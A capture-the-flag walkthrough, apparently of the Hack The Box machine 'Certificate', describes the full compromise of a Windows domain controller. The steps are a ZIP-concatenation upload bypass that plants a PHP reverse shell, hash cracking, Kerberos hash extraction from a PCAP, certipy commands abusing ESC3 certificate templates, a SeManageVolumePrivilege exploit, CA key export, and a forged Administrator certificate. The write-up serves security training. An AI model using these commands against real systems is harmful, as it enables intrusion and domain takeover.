Walk-through#

1
PORT     STATE SERVICE       VERSION
2
53/tcp   open  domain        Simple DNS Plus
3
80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
4
|_http-title: Did not follow redirect to http://certificate.htb/
5
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
6
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-01 04:29:48Z)
7
135/tcp  open  msrpc         Microsoft Windows RPC
8
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
9
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
10
| ssl-cert: Subject: commonName=DC01.certificate.htb
11
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
12
| Not valid before: 2025-09-30T19:51:26
13
|_Not valid after:  2026-09-30T19:51:26
14
|_ssl-date: 2025-10-01T04:31:13+00:00; +8h00m07s from scanner time.
15
445/tcp  open  microsoft-ds?
16
464/tcp  open  kpasswd5?
17
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
18
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
19
| ssl-cert: Subject: commonName=DC01.certificate.htb
20
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
21
| Not valid before: 2025-09-30T19:51:26
22
|_Not valid after:  2026-09-30T19:51:26
23
|_ssl-date: 2025-10-01T04:31:14+00:00; +8h00m07s from scanner time.
24
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
25
|_ssl-date: 2025-10-01T04:31:13+00:00; +8h00m07s from scanner time.
26
| ssl-cert: Subject: commonName=DC01.certificate.htb
27
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
28
| Not valid before: 2025-09-30T19:51:26
29
|_Not valid after:  2026-09-30T19:51:26
30
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
31
|_ssl-date: 2025-10-01T04:31:14+00:00; +8h00m07s from scanner time.
32
| ssl-cert: Subject: commonName=DC01.certificate.htb
33
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
34
| Not valid before: 2025-09-30T19:51:26
35
|_Not valid after:  2026-09-30T19:51:26
36
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
37
|_http-title: Not Found
38
|_http-server-header: Microsoft-HTTPAPI/2.0
39
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
40

41
Host script results:
42
| smb2-security-mode:
43
|   3:1:1:
44
|_    Message signing enabled and required
45
| smb2-time:
46
|   date: 2025-10-01T04:30:36
47
|_  start_date: N/A
48
|_clock-skew: mean: 8h00m06s, deviation: 0s, median: 8h00m06s

I am going to generate the hosts file first:

1
netexec smb 10.10.11.71 --generate-hosts-file hosts

Add this entry to your /etc/hosts:

10.10.11.71 DC01.certificate.htb certificate.htb DC01

Next, let’s take a look at port 80.

Screenshot of the main page showing a course website written in PHP.

It looks like the website is a course management platform built with PHP. You can create a student or teacher account, although teacher accounts require manual approval.

Screenshot of the account creation page highlighting the teacher account approval requirement.

I registered as a student and browsed one of the available courses. Inside the course, there is a button to submit a quiz.

Screenshot showing the 'Submit Quiz' section available to students.

There is an upload functionality that accepts only PDF, DOCX, PPTX, or XLSX files, but they must be provided inside a ZIP archive. This suggests we might be able to upload a malicious PHP file if we can bypass the file validation.

Screenshot of the upload form indicating allowed file types.

Our first attempt results in a Bad Request error, meaning we need to find a way to bypass the upload restrictions.

Screenshot of failed upload request.

Uploading a normal PDF inside a ZIP works without issues.

Screenshot of successful upload using a valid PDF.

After searching online, I found information explaining evasive ZIP concatenation, which allows appending additional data to ZIP files. The original blog post was removed, but this PDF describes the technique in detail: https://infocon.org/mirrors/vx%20underground%20-%202025%20June/Papers/Malware%20Defense/Malware%20Analysis/2024/2024-11-07%20-%20Evasive%20ZIP%20Concatenation-%20Trojan%20Targets%20Windows%20Users.pdf

I applied the same technique to embed both a valid PDF and a malicious PHP file.

Screenshot showing successful ZIP concatenation containing a malicious PHP file.

It worked.

Screenshot confirming the upload bypass was successful.

Next, I attempted to use a reverse shell.

Screenshot of reverse shell payload inside the uploaded PHP file.

To observe how the request behaves, I captured it using Burp Suite.

Burp Suite capture showing the upload request.

After setting up a listener:

Screenshot of the terminal showing the netcat listener waiting for a callback.

I explored the server and found database credentials.

Screenshot showing database connection information located on the server.

Using these credentials, I inspected the users table.

Screenshot showing the 'users' table query results.

Screenshot of password hashes extracted from the database.

I cracked the bcrypt hash with John:

1
john --format=bcrypt
2
FOUND: User 'sara.b' has password 'Blink182'

I then checked what access sara.b had using NetExec.

Screenshot showing 'sara.b' SMB enumeration results.

To collect more information, I gathered BloodHound data:

1
rusthound-ce --domain certificate.htb -u sara.b -p $PASS

Nothing interesting appeared, so I continued exploring Sara’s files. I found a PCAP file with a note mentioning issues accessing SMB shares.

Screenshot showing the PCAP file found in Sara's directory.

Using NetworkMiner (Netresec), I inspected the capture. Helpful references:

https://www.netresec.com/?page=Blog&month=2019-11&post=Extracting-Kerberos-Credentials-from-PCAP

https://www.netresec.com/?page=Blog&month=2025-04&post=How-to-Install-NetworkMiner-in-Linux

https://www.netresec.com/?page=Blog&month=2012-12&post=HowTo-handle-PcapNG-files

I extracted the Kerberos hash for lion.sk.

Screenshot showing extracted Kerberos hash of lion.sk.

I cracked it:

Screenshot of cracking results showing the plaintext password.

Password: !QAZ2wsx

With this, I obtained the user flag.

Screenshot displaying the user.txt flag.

BloodHound showed that lion.sk belongs to the CRA Managers group. I ran Certipy:

1
certipy-ad find -vulnerable -u lion.sk@certificate.htb -p $PASS2 -stdout

This identified a template vulnerable to ESC3.

Screenshot showing vulnerable certificate templates supporting ESC3.

Since the CRA Managers group has the required privileges, I searched for a suitable target template:

1
certipy-ad find -u lion.sk@certificate.htb -p $PASS2 -stdout

The results showed that SignedUser was a valid target.

Screenshot confirming SignedUser can be used as a target template.

Attempting to request on behalf of Administrator failed due to missing email attributes, so I listed users with email addresses:

1
ldapsearch -x -H ldap://10.10.11.71 -D "lion.sk@certificate.htb" -w $PASS2 -b "DC=certificate,DC=htb" "(mail=*)" sAMAccountName mail

I reviewed user profiles on the machine:

1
Directory: C:\Users
2

3
Administrator
4
akeder.kh
5
Lion.SK
6
Public
7
Ryan.K
8
Sara.B
9
xamppuser

Since akeder.kh was not listed earlier and sara.b was already compromised, I targeted ryan.k.

Requesting a certificate:

1
certipy-ad req -u lion.sk@certificate.htb -p $PASS2 -dc-ip 10.10.11.71 -ca Certificate-LTD-CA -target 'DC01.certificate.htb' -template 'Delegated-CRA'

Then:

1
certipy-ad req -u lion.sk@certificate.htb -p $PASS2 -dc-ip 10.10.11.71 -ca Certificate-LTD-CA -target 'DC01.certificate.htb' -template 'SignedUser' -on-behalf-of ryan.k -pfx lion.sk.pfx

Authenticating:

1
certipy-ad auth -pfx ryan.k.pfx -dc-ip 10.10.11.71 -domain certificate.htb

Now I had his NT hash.

Inspecting privileges:

1
whoami /priv

ryan.k had SeManageVolumePrivilege, which is exploitable. Exploit reference: https://github.com/CsEnox/SeManageVolumeExploit

Running it:

1
./SeManageVolumeExploit.exe

I confirmed modified ACLs:

1
icacls C:\Windows

Trying to inject a DLL would trip Windows Defender, so instead I extracted the private key of the CA to forge an Administrator certificate.

1
certutil -exportPFX my "Certificate-LTD-CA" C:\temp\ca.pfx

Using Certipy to forge:

1
certipy-ad forge -ca-pfx ca.pfx -upn 'administrator@certificate.htb' -out forged_admin.pfx

Authenticate as Administrator:

1
certipy-ad auth -dc-ip '10.10.11.71' -pfx 'forged_admin.pfx' -username 'administrator' -domain 'certificate.htb'

And with that, we fully compromised the machine.